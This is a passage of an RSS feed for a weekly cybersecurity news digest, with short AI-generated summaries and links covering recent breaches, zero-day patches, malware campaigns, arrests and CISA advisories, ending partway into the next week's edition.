Hackers, identified as Shiny Hunters, stole personal data of millions from luxury brands Gucci, Balenciaga, and Alexander McQueen, including names and contact details, raising concerns about targeted scams.&#xA;https://securityaffairs.com/182236/cyber-crime/hackers-steal-millions-of-gucci-balenciaga-and-alexander-mcqueen-customer-records.html&#xA;&#xA;🦠 FileFix attacks trick victims into executing infostealers&#xA;malware - The FileFix attack tricks victims into executing malware by posing as a Facebook security alert, leading to the installation of the StealC infostealer. This method has surged in popularity, emphasizing the need for improved anti-phishing training.&#xA;https://www.theregister.com/2025/09/16/filefixattacksfacebooksecurityalert/&#xA;&#xA;🤖 Millions turn to AI chatbots for spiritual guidance and confession&#xA;privacy - Tens of millions are using AI chatbots for spiritual advice, with apps gaining popularity for their accessibility. However, concerns arise over their accuracy, privacy, and the nature of their responses.&#xA;https://arstechnica.com/ai/2025/09/millions-turn-to-ai-chatbots-for-spiritual-guidance-and-confession/&#xA;&#xA;🛡️ OpenAI to predict ages in bid to stop ChatGPT from discussing self harm with kids&#xA;privacy - OpenAI is implementing age prediction and identity verification systems to protect minors after a lawsuit linked its chatbot to a teenager&#39;s suicide. The company prioritizes safety over privacy for younger users.&#xA;https://therecord.media/openai-age-prediction-chatgpt-children-safety&#xA;&#xA;🔒 Samsung patches zero-day security flaw used to hack into its customers&#39; phones&#xA;vulnerability - Samsung has patched a zero-day vulnerability that allowed hackers to remotely install malicious code on devices running Android 13 to 16, following a private alert from Meta and WhatsApp.&#xA;https://techcrunch.com/2025/09/16/samsung-patches-zero-day-security-flaw-used-to-hack-into-its-customers-phones/&#xA;&#xA;🔧 Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs&#xA;vulnerability - Apple&#39;s latest updates for iOS, iPadOS, and macOS patch multiple vulnerabilities, including some with potential root access, but no active exploits have been reported. Users can also update to earlier versions for critical patches.&#xA;https://cyberscoop.com/apple-security-updates-september-2025/&#xA;&#xA;⚖️ BreachForums founder resentenced to three years in prison&#xA;cybercrime - Conor Brian Fitzpatrick, founder of the BreachForums cybercrime marketplace, was resentenced to three years in prison after a lenient initial sentence was overturned due to his lack of remorse and continued illegal activities.&#xA;https://cyberscoop.com/conor-fitzpatrick-pompompurin-resetenced-breachforums/&#xA;&#xA;🖥️ Consumer Reports asks Microsoft to keep supporting Windows 10&#xA;security news - Consumer Reports has urged Microsoft to continue supporting Windows 10, highlighting concerns about user security and compatibility as the transition to Windows 11 proceeds.&#xA;https://www.theverge.com/news/779079/consumer-reports-windows-10-extended-support-microsoft&#xA;&#xA;📰 Russian fake-news network back in action with 200+ new sites&#xA;security news - A Russian troll farm has launched over 200 new fake news websites using AI to generate content, aiming to influence political discourse in multiple countries, including the US and Canada.&#xA;https://www.theregister.com/2025/09/18/russianfakenewsnetwork/&#xA;&#xA;🔒 10585 is the sixth actively exploited Chrome zero&#xA;vulnerability - Google patched four vulnerabilities in Chrome, including the actively exploited zero-day CVE-2025-10585, a type confusion issue in the V8 engine, marking the sixth such vulnerability in 2025.&#xA;https://securityaffairs.com/182322/uncategorized/cve-2025-10585-is-the-sixth-actively-exploited-chrome-zero-day-patched-by-google-in-2025.html&#xA;&#xA;🛠️ Open-Source Tool Greenshot Hit by Severe Code Execution Vulnerability&#xA;vulnerability - A critical vulnerability in Greenshot allows arbitrary code execution due to improper data handling, risking exploitation by local attackers. Users are urged to update to version 1.3.301 to mitigate the issue.&#xA;https://thecyberexpress.com/greenshot-vulnerability/&#xA;&#xA;📚 Librarians Are Being Asked to Find AI-Hallucinated Books&#xA;security news - Librarians report increasing patron requests for non-existent books generated by AI, leading to confusion and diminished trust in information sources. The impact of generative AI on libraries raises concerns about information literacy and the quality of resources.&#xA;https://www.404media.co/librarians-are-being-asked-to-find-ai-hallucinated-books/&#xA;&#xA;🚆 ‘Scattered Spider’ teens charged over London transportation hack&#xA;cybercrime - Two teenagers from the &#39;Scattered Spider&#39; group have been charged in connection with a cyberattack that disrupted London&#39;s transportation systems, highlighting growing concerns about youth involvement in cybercrime.&#xA;https://www.theverge.com/news/781039/scattered-spider-teens-charged-tfl-london-hack&#xA;&#xA;✈️ Russia&#39;s main airport in St. Petersburg says its website was hacked&#xA;security news - Pulkovo Airport in St. Petersburg experienced a cyberattack that took its website offline, although flight operations remained unaffected. This follows other disruptions in Russia&#39;s aviation sector amid rising cyberattacks since the Ukraine invasion.&#xA;https://therecord.media/russia-pulkovo-airport-st-petersburg-website-hacked&#xA;&#xA;👶 Watchdog finds MrBeast improperly collected children’s data&#xA;privacy - The Children’s Advertising Review Unit found that YouTuber MrBeast collected children&#39;s data without parental consent, violating COPPA guidelines. He has since updated his data collection practices in response to the findings.&#xA;https://therecord.media/watchdog-mrbeast-youtube-privacy-colection&#xA;&#xA;🚗 JLR Cyberattack Becomes UK National Crisis&#xA;cybercrime - The Jaguar Land Rover cyberattack has halted production, affecting over 200,000 workers and prompting government discussions for support. The incident, attributed to the Scattered Lapsus$ Hunters group, is causing significant financial losses.&#xA;https://thecyberexpress.com/jlr-cyberattack-becomes-uk-national-crisis/&#xA;&#xA;✈️ Hundreds of flights delayed at Heathrow and other airports after apparent cyberattack&#xA;security news - A cyber-related incident involving Collins Aerospace led to significant flight delays at major European airports, including Heathrow, as airlines reverted to manual check-ins. Travelers are advised to arrive earlier for flights.&#xA;https://techcrunch.com/2025/09/21/hundreds-of-flights-delayed-at-heathrow-and-other-airports-after-apparent-cyberattack/&#xA;&#xA;---&#xA;Some More, For the Curious&#xA;🚨 T-1 month: Exchange Server 2016 and Exchange Server 2019 End of Support&#xA;security news - Exchange Server 2016 and 2019 reach end of support on October 14, 2025, risking security vulnerabilities without updates. Users are urged to upgrade or migrate to Exchange Online.&#xA;https://techcommunity.microsoft.com/blog/exchange/t-1-month-exchange-server-2016-and-exchange-server-2019-end-of-support/4453133&#xA;&#xA;🕵️‍♂️ One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens&#xA;vulnerability - A critical vulnerability in Entra ID allows attackers to impersonate Global Admins across tenants using undocumented Actor tokens. Microsoft swiftly fixed the issue, but risks remain.&#xA;https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/&#xA;&#xA;💨 Hosting a WebSite on a Disposable Vape&#xA;hacking write-up - An innovative project explores hosting a web server on a disposable vape&#39;s microcontroller, achieving surprisingly fast response times despite its limited specs. A humorous take on tech recycling!&#xA;https://bogdanthegeek.github.io/blog/projects/vapeserver/&#xA;&#xA;🔓 Windows Local Privilege Escalation through the bitpixie Vulnerability&#xA;vulnerability - The bitpixie vulnerability allows attackers to bypass BitLocker encryption via a downgrade attack on Windows Boot Manager, risking unauthorized access. A Microsoft patch is available to mitigate this risk.&#xA;https://blog.syss.com/posts/bitpixie/&#xA;&#xA;🚨 China Imposes One-Hour Reporting Rule for Major Cybersecurity Incidents&#xA;security news - China&#39;s new regulations mandate reporting severe cybersecurity incidents within one hour, enhancing enforcement following high-profile data breaches. Proposed law amendments suggest stricter penalties for non-compliance.&#xA;https://thecyberexpress.com/china-cybersecurity-incident-reporting/&#xA;&#xA;🛡️ Google Online Security Blog: Supporting Rowhammer research to protect the DRAM ecosystem&#xA;security research - Google supports research on Rowhammer vulnerabilities in DRAM, leading to the development of test platforms and new attack patterns that expose weaknesses in existing mitigations, necessitating further improvements.&#xA;http://security.googleblog.com/2025/09/supporting-rowhammer-research-to.html&#xA;&#xA;🐍 Replicating Worm Hits 180+ Software Packages – Krebs on Security&#xA;cybercrime - The Shai-Hulud worm has infected over 180 NPM packages, stealing credentials and publishing them on GitHub. It self-replicates, raising concerns over supply chain security in software development.&#xA;https://krebsonsecurity.com/2025/09/self-replicating-worm-hits-180-software-packages/&#xA;&#xA;🚫 Microsoft, Cloudflare shut down RaccoonO365 phishing domains&#xA;cyber defense - Microsoft seized 338 domains linked to the RaccoonO365 phishing operation, led by Joshua Ogundipe, which sold phishing kits that compromised Microsoft 365 credentials. The takedown disrupts a major tool used by cybercriminals.&#xA;https://www.theregister.com/2025/09/16/microsoftcloudflareshutdownraccoono365/&#xA;&#xA;💻 HybridPetya: The Petya/NotPetya copycat comes with a twist&#xA;malware - ESET has identified a new ransomware called HybridPetya, which mimics NotPetya but can also compromise UEFI systems and exploit CVE‑2024‑7344 to bypass UEFI Secure Boot. It&#39;s not currently spreading in the wild.&#xA;https://www.welivesecurity.com/en/videos/hybridpetya-petya-notpetya-copycat-twist/&#xA;&#xA;🔓 Attack on SonicWall’s cloud portal exposes customers’ firewall configurations&#xA;data breach - SonicWall confirmed a breach of its MySonicWall.com platform, exposing firewall configuration files of less than 5% of its customers. The incident highlights systemic security issues within the vendor&#39;s operations.&#xA;https://cyberscoop.com/sonicwall-cyberattack-customer-firewall-configurations/&#xA;&#xA;⛈️ Cloudflare DDoSed itself with React useEffect hook blunder&#xA;security news - Cloudflare experienced an outage due to a coding error involving a React useEffect hook, which caused excessive API calls and overloaded its Tenant Service API. The incident sparked discussions on the proper use of useEffect in development.&#xA;https://www.theregister.com/2025/09/18/cloudflareddoseditself/&#xA;&#xA;⚙️ SystemBC – Bringing the Noise&#xA;security research - Lumen&#39;s Black Lotus Labs discovered the SystemBC botnet, leveraging over 80 C2s and primarily targeting VPS systems to create high-volume proxies for cybercriminal activities. The botnet is linked to various criminal groups and is being used alongside the REM Proxy service for malicious operations.&#xA;https://blog.lumen.com/systembc-bringing-the-noise/&#xA;&#xA;🔒 CISA Warns of New Malware Campaign Exploiting Ivanti EPMM Vulnerabilities&#xA;vulnerability - CISA reports a malware campaign exploiting Ivanti EPMM vulnerabilities (CVE-2025-4427 and CVE-2025-4428), allowing unauthorized access and malware deployment. Organizations are urged to upgrade systems and implement security measures.&#xA;https://thecyberexpress.com/cisa-mar-cve-2025-4427-28/&#xA;&#xA;🔐 CVE-2025-10035: Critical Vulnerability in Fortra GoAnywhere MFT&#xA;vulnerability - A critical vulnerability, CVE-2025-10035, has been identified in Fortra&#39;s GoAnywhere MFT software, potentially exposing sensitive data. Users are urged to apply patches immediately to mitigate risks.&#xA;https://www.vulncheck.com/blog/cve-2025-10035-fortra-go-anywhere-mft&#xA;&#xA;🤔 Future of CVE Program in limbo as CISA, board members debate path forward&#xA;security news - The future of the CVE Program is under debate after a funding incident raised concerns about its management. CISA asserts its leadership role while board members advocate for a collaborative, globally-supported model.&#xA;https://therecord.media/cve-program-future-limbo-cisa&#xA;&#xA;---&#xA;CISA Corner&#xA;⚙️ CISA Releases Eight Industrial Control Systems Advisories&#xA;vulnerability - CISA has issued eight advisories addressing vulnerabilities in various Industrial Control Systems, including products from Siemens, Schneider Electric, and Hitachi Energy, urging users to review for mitigations.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/16/cisa-releases-eight-industrial-control-systems-advisories&#xA;⚙️ CISA Releases Nine Industrial Control Systems Advisories&#xA;vulnerability - CISA has issued nine advisories addressing vulnerabilities in various Industrial Control Systems, including products from Westermo, Schneider Electric, and Hitachi Energy, urging users to review for mitigations.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/18/cisa-releases-nine-industrial-control-systems-advisories&#xA;&#xA;---&#xA;While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...&#xA;Most of the articles are in English, but some current warnings might be in German.]]&gt;</description>
      <content:encoded><![CDATA[<p>A weekly shortlist of cyber security highlights.
The short summaries are AI generated! If something is wrong, please let me know!</p>

<hr>

<h3 id="news-for-all">News For All</h3>

<p>✈️ Airlines Sell 5 Billion Plane Ticket Records to the Government For Warrantless Searching
<em>privacy – Major airlines are selling billions of ticket records to the government for warrantless monitoring, raising significant privacy concerns about surveillance of individuals&#39; movements.</em>
<a href="https://www.404media.co/airlines-sell-5-billion-plane-ticket-records-to-the-government-for-warrantless-searching/" rel="nofollow">https://www.404media.co/airlines-sell-5-billion-plane-ticket-records-to-the-government-for-warrantless-searching/</a></p>

<p>🔑 Password Security Part 2: The Human Factor – Password Patterns and Weaknesses
<em>cyber defense – Human behavior leads to predictable password patterns that compromise security. Organizations can mitigate risks through password policies, filtering, and multi-factor authentication, while credential audits reveal weaknesses.</em>
<a href="https://www.guidepointsecurity.com/blog/password-security-part-2-human-factor-patterns-weaknesses/" rel="nofollow">https://www.guidepointsecurity.com/blog/password-security-part-2-human-factor-patterns-weaknesses/</a></p>

<p>💼 Hackers steal millions of Gucci, Balenciaga, and Alexander McQueen customer records
<em>data breach – Hackers, identified as Shiny Hunters, stole personal data of millions from luxury brands Gucci, Balenciaga, and Alexander McQueen, including names and contact details, raising concerns about targeted scams.</em>
<a href="https://securityaffairs.com/182236/cyber-crime/hackers-steal-millions-of-gucci-balenciaga-and-alexander-mcqueen-customer-records.html" rel="nofollow">https://securityaffairs.com/182236/cyber-crime/hackers-steal-millions-of-gucci-balenciaga-and-alexander-mcqueen-customer-records.html</a></p>

<p>🦠 FileFix attacks trick victims into executing infostealers
<em>malware – The FileFix attack tricks victims into executing malware by posing as a Facebook security alert, leading to the installation of the StealC infostealer. This method has surged in popularity, emphasizing the need for improved anti-phishing training.</em>
<a href="https://www.theregister.com/2025/09/16/filefix_attacks_facebook_security_alert/" rel="nofollow">https://www.theregister.com/2025/09/16/filefix_attacks_facebook_security_alert/</a></p>

<p>🤖 Millions turn to AI chatbots for spiritual guidance and confession
<em>privacy – Tens of millions are using AI chatbots for spiritual advice, with apps gaining popularity for their accessibility. However, concerns arise over their accuracy, privacy, and the nature of their responses.</em>
<a href="https://arstechnica.com/ai/2025/09/millions-turn-to-ai-chatbots-for-spiritual-guidance-and-confession/" rel="nofollow">https://arstechnica.com/ai/2025/09/millions-turn-to-ai-chatbots-for-spiritual-guidance-and-confession/</a></p>

<p>🛡️ OpenAI to predict ages in bid to stop ChatGPT from discussing self harm with kids
<em>privacy – OpenAI is implementing age prediction and identity verification systems to protect minors after a lawsuit linked its chatbot to a teenager&#39;s suicide. The company prioritizes safety over privacy for younger users.</em>
<a href="https://therecord.media/openai-age-prediction-chatgpt-children-safety" rel="nofollow">https://therecord.media/openai-age-prediction-chatgpt-children-safety</a></p>

<p>🔒 Samsung patches zero-day security flaw used to hack into its customers&#39; phones
<em>vulnerability – Samsung has patched a zero-day vulnerability that allowed hackers to remotely install malicious code on devices running Android 13 to 16, following a private alert from Meta and WhatsApp.</em>
<a href="https://techcrunch.com/2025/09/16/samsung-patches-zero-day-security-flaw-used-to-hack-into-its-customers-phones/" rel="nofollow">https://techcrunch.com/2025/09/16/samsung-patches-zero-day-security-flaw-used-to-hack-into-its-customers-phones/</a></p>

<p>🔧 Apple addresses dozens of vulnerabilities in latest software for iPhones, iPads and Macs
<em>vulnerability – Apple&#39;s latest updates for iOS, iPadOS, and macOS patch multiple vulnerabilities, including some with potential root access, but no active exploits have been reported. Users can also update to earlier versions for critical patches.</em>
<a href="https://cyberscoop.com/apple-security-updates-september-2025/" rel="nofollow">https://cyberscoop.com/apple-security-updates-september-2025/</a></p>

<p>⚖️ BreachForums founder resentenced to three years in prison
<em>cybercrime – Conor Brian Fitzpatrick, founder of the BreachForums cybercrime marketplace, was resentenced to three years in prison after a lenient initial sentence was overturned due to his lack of remorse and continued illegal activities.</em>
<a href="https://cyberscoop.com/conor-fitzpatrick-pompompurin-resetenced-breachforums/" rel="nofollow">https://cyberscoop.com/conor-fitzpatrick-pompompurin-resetenced-breachforums/</a></p>

<p>🖥️ Consumer Reports asks Microsoft to keep supporting Windows 10
<em>security news – Consumer Reports has urged Microsoft to continue supporting Windows 10, highlighting concerns about user security and compatibility as the transition to Windows 11 proceeds.</em>
<a href="https://www.theverge.com/news/779079/consumer-reports-windows-10-extended-support-microsoft" rel="nofollow">https://www.theverge.com/news/779079/consumer-reports-windows-10-extended-support-microsoft</a></p>

<p>📰 Russian fake-news network back in action with 200+ new sites
<em>security news – A Russian troll farm has launched over 200 new fake news websites using AI to generate content, aiming to influence political discourse in multiple countries, including the US and Canada.</em>
<a href="https://www.theregister.com/2025/09/18/russian_fakenews_network/" rel="nofollow">https://www.theregister.com/2025/09/18/russian_fakenews_network/</a></p>

<p>🔒 10585 is the sixth actively exploited Chrome zero
<em>vulnerability – Google patched four vulnerabilities in Chrome, including the actively exploited zero-day CVE-2025-10585, a type confusion issue in the V8 engine, marking the sixth such vulnerability in 2025.</em>
<a href="https://securityaffairs.com/182322/uncategorized/cve-2025-10585-is-the-sixth-actively-exploited-chrome-zero-day-patched-by-google-in-2025.html" rel="nofollow">https://securityaffairs.com/182322/uncategorized/cve-2025-10585-is-the-sixth-actively-exploited-chrome-zero-day-patched-by-google-in-2025.html</a></p>

<p>🛠️ Open-Source Tool Greenshot Hit by Severe Code Execution Vulnerability
<em>vulnerability – A critical vulnerability in Greenshot allows arbitrary code execution due to improper data handling, risking exploitation by local attackers. Users are urged to update to version 1.3.301 to mitigate the issue.</em>
<a href="https://thecyberexpress.com/greenshot-vulnerability/" rel="nofollow">https://thecyberexpress.com/greenshot-vulnerability/</a></p>

<p>📚 Librarians Are Being Asked to Find AI-Hallucinated Books
<em>security news – Librarians report increasing patron requests for non-existent books generated by AI, leading to confusion and diminished trust in information sources. The impact of generative AI on libraries raises concerns about information literacy and the quality of resources.</em>
<a href="https://www.404media.co/librarians-are-being-asked-to-find-ai-hallucinated-books/" rel="nofollow">https://www.404media.co/librarians-are-being-asked-to-find-ai-hallucinated-books/</a></p>

<p>🚆 ‘Scattered Spider’ teens charged over London transportation hack
<em>cybercrime – Two teenagers from the &#39;Scattered Spider&#39; group have been charged in connection with a cyberattack that disrupted London&#39;s transportation systems, highlighting growing concerns about youth involvement in cybercrime.</em>
<a href="https://www.theverge.com/news/781039/scattered-spider-teens-charged-tfl-london-hack" rel="nofollow">https://www.theverge.com/news/781039/scattered-spider-teens-charged-tfl-london-hack</a></p>

<p>✈️ Russia&#39;s main airport in St. Petersburg says its website was hacked
<em>security news – Pulkovo Airport in St. Petersburg experienced a cyberattack that took its website offline, although flight operations remained unaffected. This follows other disruptions in Russia&#39;s aviation sector amid rising cyberattacks since the Ukraine invasion.</em>
<a href="https://therecord.media/russia-pulkovo-airport-st-petersburg-website-hacked" rel="nofollow">https://therecord.media/russia-pulkovo-airport-st-petersburg-website-hacked</a></p>

<p>👶 Watchdog finds MrBeast improperly collected children’s data
<em>privacy – The Children’s Advertising Review Unit found that YouTuber MrBeast collected children&#39;s data without parental consent, violating COPPA guidelines. He has since updated his data collection practices in response to the findings.</em>
<a href="https://therecord.media/watchdog-mrbeast-youtube-privacy-colection" rel="nofollow">https://therecord.media/watchdog-mrbeast-youtube-privacy-colection</a></p>

<p>🚗 JLR Cyberattack Becomes UK National Crisis
<em>cybercrime – The Jaguar Land Rover cyberattack has halted production, affecting over 200,000 workers and prompting government discussions for support. The incident, attributed to the Scattered Lapsus$ Hunters group, is causing significant financial losses.</em>
<a href="https://thecyberexpress.com/jlr-cyberattack-becomes-uk-national-crisis/" rel="nofollow">https://thecyberexpress.com/jlr-cyberattack-becomes-uk-national-crisis/</a></p>

<p>✈️ Hundreds of flights delayed at Heathrow and other airports after apparent cyberattack
<em>security news – A cyber-related incident involving Collins Aerospace led to significant flight delays at major European airports, including Heathrow, as airlines reverted to manual check-ins. Travelers are advised to arrive earlier for flights.</em>
<a href="https://techcrunch.com/2025/09/21/hundreds-of-flights-delayed-at-heathrow-and-other-airports-after-apparent-cyberattack/" rel="nofollow">https://techcrunch.com/2025/09/21/hundreds-of-flights-delayed-at-heathrow-and-other-airports-after-apparent-cyberattack/</a></p>

<hr>

<h3 id="some-more-for-the-curious">Some More, For the Curious</h3>

<p>🚨 T-1 month: Exchange Server 2016 and Exchange Server 2019 End of Support
<em>security news – Exchange Server 2016 and 2019 reach end of support on October 14, 2025, risking security vulnerabilities without updates. Users are urged to upgrade or migrate to Exchange Online.</em>
<a href="https://techcommunity.microsoft.com/blog/exchange/t-1-month-exchange-server-2016-and-exchange-server-2019-end-of-support/4453133" rel="nofollow">https://techcommunity.microsoft.com/blog/exchange/t-1-month-exchange-server-2016-and-exchange-server-2019-end-of-support/4453133</a></p>

<p>🕵️‍♂️ One Token to rule them all – obtaining Global Admin in every Entra ID tenant via Actor tokens
<em>vulnerability – A critical vulnerability in Entra ID allows attackers to impersonate Global Admins across tenants using undocumented Actor tokens. Microsoft swiftly fixed the issue, but risks remain.</em>
<a href="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/" rel="nofollow">https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/</a></p>

<p>💨 Hosting a WebSite on a Disposable Vape
<em>hacking write-up – An innovative project explores hosting a web server on a disposable vape&#39;s microcontroller, achieving surprisingly fast response times despite its limited specs. A humorous take on tech recycling!</em>
<a href="https://bogdanthegeek.github.io/blog/projects/vapeserver/" rel="nofollow">https://bogdanthegeek.github.io/blog/projects/vapeserver/</a></p>

<p>🔓 Windows Local Privilege Escalation through the bitpixie Vulnerability
<em>vulnerability – The bitpixie vulnerability allows attackers to bypass BitLocker encryption via a downgrade attack on Windows Boot Manager, risking unauthorized access. A Microsoft patch is available to mitigate this risk.</em>
<a href="https://blog.syss.com/posts/bitpixie/" rel="nofollow">https://blog.syss.com/posts/bitpixie/</a></p>

<p>🚨 China Imposes One-Hour Reporting Rule for Major Cybersecurity Incidents
<em>security news – China&#39;s new regulations mandate reporting severe cybersecurity incidents within one hour, enhancing enforcement following high-profile data breaches. Proposed law amendments suggest stricter penalties for non-compliance.</em>
<a href="https://thecyberexpress.com/china-cybersecurity-incident-reporting/" rel="nofollow">https://thecyberexpress.com/china-cybersecurity-incident-reporting/</a></p>

<p>🛡️ Google Online Security Blog: Supporting Rowhammer research to protect the DRAM ecosystem
<em>security research – Google supports research on Rowhammer vulnerabilities in DRAM, leading to the development of test platforms and new attack patterns that expose weaknesses in existing mitigations, necessitating further improvements.</em>
<a href="http://security.googleblog.com/2025/09/supporting-rowhammer-research-to.html" rel="nofollow">http://security.googleblog.com/2025/09/supporting-rowhammer-research-to.html</a></p>

<p>🐍 Replicating Worm Hits 180+ Software Packages – Krebs on Security
<em>cybercrime – The Shai-Hulud worm has infected over 180 NPM packages, stealing credentials and publishing them on GitHub. It self-replicates, raising concerns over supply chain security in software development.</em>
<a href="https://krebsonsecurity.com/2025/09/self-replicating-worm-hits-180-software-packages/" rel="nofollow">https://krebsonsecurity.com/2025/09/self-replicating-worm-hits-180-software-packages/</a></p>

<p>🚫 Microsoft, Cloudflare shut down RaccoonO365 phishing domains
<em>cyber defense – Microsoft seized 338 domains linked to the RaccoonO365 phishing operation, led by Joshua Ogundipe, which sold phishing kits that compromised Microsoft 365 credentials. The takedown disrupts a major tool used by cybercriminals.</em>
<a href="https://www.theregister.com/2025/09/16/microsoft_cloudflare_shut_down_raccoono365/" rel="nofollow">https://www.theregister.com/2025/09/16/microsoft_cloudflare_shut_down_raccoono365/</a></p>

<p>💻 HybridPetya: The Petya/NotPetya copycat comes with a twist
<em>malware – ESET has identified a new ransomware called HybridPetya, which mimics NotPetya but can also compromise UEFI systems and exploit CVE‑2024‑7344 to bypass UEFI Secure Boot. It&#39;s not currently spreading in the wild.</em>
<a href="https://www.welivesecurity.com/en/videos/hybridpetya-petya-notpetya-copycat-twist/" rel="nofollow">https://www.welivesecurity.com/en/videos/hybridpetya-petya-notpetya-copycat-twist/</a></p>

<p>🔓 Attack on SonicWall’s cloud portal exposes customers’ firewall configurations
<em>data breach – SonicWall confirmed a breach of its MySonicWall.com platform, exposing firewall configuration files of less than 5% of its customers. The incident highlights systemic security issues within the vendor&#39;s operations.</em>
<a href="https://cyberscoop.com/sonicwall-cyberattack-customer-firewall-configurations/" rel="nofollow">https://cyberscoop.com/sonicwall-cyberattack-customer-firewall-configurations/</a></p>

<p>⛈️ Cloudflare DDoSed itself with React useEffect hook blunder
<em>security news – Cloudflare experienced an outage due to a coding error involving a React useEffect hook, which caused excessive API calls and overloaded its Tenant Service API. The incident sparked discussions on the proper use of useEffect in development.</em>
<a href="https://www.theregister.com/2025/09/18/cloudflare_ddosed_itself/" rel="nofollow">https://www.theregister.com/2025/09/18/cloudflare_ddosed_itself/</a></p>

<p>⚙️ SystemBC – Bringing the Noise
<em>security research – Lumen&#39;s Black Lotus Labs discovered the SystemBC botnet, leveraging over 80 C2s and primarily targeting VPS systems to create high-volume proxies for cybercriminal activities. The botnet is linked to various criminal groups and is being used alongside the REM Proxy service for malicious operations.</em>
<a href="https://blog.lumen.com/systembc-bringing-the-noise/" rel="nofollow">https://blog.lumen.com/systembc-bringing-the-noise/</a></p>

<p>🔒 CISA Warns of New Malware Campaign Exploiting Ivanti EPMM Vulnerabilities
<em>vulnerability – CISA reports a malware campaign exploiting Ivanti EPMM vulnerabilities (CVE-2025-4427 and CVE-2025-4428), allowing unauthorized access and malware deployment. Organizations are urged to upgrade systems and implement security measures.</em>
<a href="https://thecyberexpress.com/cisa-mar-cve-2025-4427-28/" rel="nofollow">https://thecyberexpress.com/cisa-mar-cve-2025-4427-28/</a></p>

<p>🔐 CVE-2025-10035: Critical Vulnerability in Fortra GoAnywhere MFT
<em>vulnerability – A critical vulnerability, CVE-2025-10035, has been identified in Fortra&#39;s GoAnywhere MFT software, potentially exposing sensitive data. Users are urged to apply patches immediately to mitigate risks.</em>
<a href="https://www.vulncheck.com/blog/cve-2025-10035-fortra-go-anywhere-mft" rel="nofollow">https://www.vulncheck.com/blog/cve-2025-10035-fortra-go-anywhere-mft</a></p>

<p>🤔 Future of CVE Program in limbo as CISA, board members debate path forward
<em>security news – The future of the CVE Program is under debate after a funding incident raised concerns about its management. CISA asserts its leadership role while board members advocate for a collaborative, globally-supported model.</em>
<a href="https://therecord.media/cve-program-future-limbo-cisa" rel="nofollow">https://therecord.media/cve-program-future-limbo-cisa</a></p>

<hr>

<h3 id="cisa-corner">CISA Corner</h3>

<p>⚙️ CISA Releases Eight Industrial Control Systems Advisories
<em>vulnerability – CISA has issued eight advisories addressing vulnerabilities in various Industrial Control Systems, including products from Siemens, Schneider Electric, and Hitachi Energy, urging users to review for mitigations.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/16/cisa-releases-eight-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/16/cisa-releases-eight-industrial-control-systems-advisories</a>
⚙️ CISA Releases Nine Industrial Control Systems Advisories
<em>vulnerability – CISA has issued nine advisories addressing vulnerabilities in various Industrial Control Systems, including products from Westermo, Schneider Electric, and Hitachi Energy, urging users to review for mitigations.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/18/cisa-releases-nine-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/18/cisa-releases-nine-industrial-control-systems-advisories</a></p>

<hr>

<p>While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...
Most of the articles are in English, but some current warnings might be in German.</p>
]]></content:encoded>
      <author>📰wrzlbrmpft&#39;s cyberlights💥</author>
      <guid>https://infosec.press/read/a/h60zilx8ur</guid>
      <pubDate>Sun, 21 Sep 2025 19:39:59 +0000</pubDate>
    </item>
    <item>
      <title>cyberlights - week 37/2025</title>
      <link>https://infosec.press/wrzlbrmpfts-cyberlights/cyberlights-week-37-2025</link>
      <description>&lt;![CDATA[A weekly shortlist of cyber security highlights.&#xA;The short summaries are AI generated! If something is wrong, please let me know!&#xA;&#xA;---&#xA;Highlight&#xA;🤞 We Got Lucky: The Supply Chain Disaster That Almost Happened&#xA;No summary here, just a recommendation to read&#xA;https://www.aikido.dev/blog/we-got-lucky-the-supply-chain-disaster-that-almost-happened&#xA;---&#xA;News For All&#xA;💾 Signal introduces free and paid backup plans for your chats&#xA;security news - Signal now allows users to back up chats for free and offers a paid plan for full media backups. This enhances its value for secure messaging amid privacy concerns.&#xA;https://techcrunch.com/2025/09/08/signal-introduces-free-and-paid-backup-plans-for-your-chats/&#xA;&#xA;📺 Plex admits breach of account details, hashed passwords&#xA;data breach - Plex has warned users to reset passwords after a breach potentially exposed emails, usernames, and hashed passwords. While credit card data wasn&#39;t compromised, this incident echoes previous breaches.&#xA;https://www.theregister.com/2025/09/09/plexbreach/&#xA;&#xA;🏋️‍♂️ Call audio from gym members, employees in open database&#xA;data breach - An unprotected AWS database exposed sensitive audio recordings of gym members discussing personal and financial information. This raises concerns about potential identity theft and social engineering attacks.&#xA;https://www.theregister.com/2025/09/09/gymaudiorecordingsexposed/&#xA;&#xA;🔒 Apple says the iPhone 17 comes with a massive security upgrade&#xA;security news - Apple&#39;s iPhone 17 features Memory Integrity Enforcement, an always-on security measure aimed at complicating spyware development, enhancing user protection.&#xA;https://www.theverge.com/news/775234/iphone-17-air-a19-memory-integrity-enforcement-mte-security&#xA;&#xA;📱 Nepal lifts social media ban after deadly youth protests&#xA;security news - Nepal has lifted a ban on social media platforms following violent protests that resulted in 29 deaths. The government faced criticism for the ban, deemed digital repression by rights groups.&#xA;https://therecord.media/nepal-social-media-ban-lifted-after-deadly-protests&#xA;&#xA;🚗 Jaguar Land Rover says data stolen in disruptive cyberattack&#xA;data breach - Jaguar Land Rover reported a cyberattack that resulted in data theft and halted vehicle assembly lines. The extent of the stolen data and its impact on employees or customers remains unclear.&#xA;https://techcrunch.com/2025/09/10/jaguar-land-rover-says-data-stolen-in-disruptive-cyberattack/&#xA;&#xA;🖼️ Google Online Security Blog: How Pixel and Android are bringing a new level of trust to your images with C2PA Content Credentials&#xA;security news - Google&#39;s Pixel and Android devices now utilize C2PA Content Credentials to enhance image authenticity, providing users with verifiable trust in their images and combating misinformation.&#xA;http://security.googleblog.com/2025/09/pixel-android-trusted-images-c2pa-content-credentials.html&#xA;&#xA;🔐 Brussels faces privacy crossroads over encryption backdoors&#xA;privacy - Europe debates legislation requiring scanning of user content for child abuse, raising concerns over privacy and security. Critics argue it could lead to false accusations 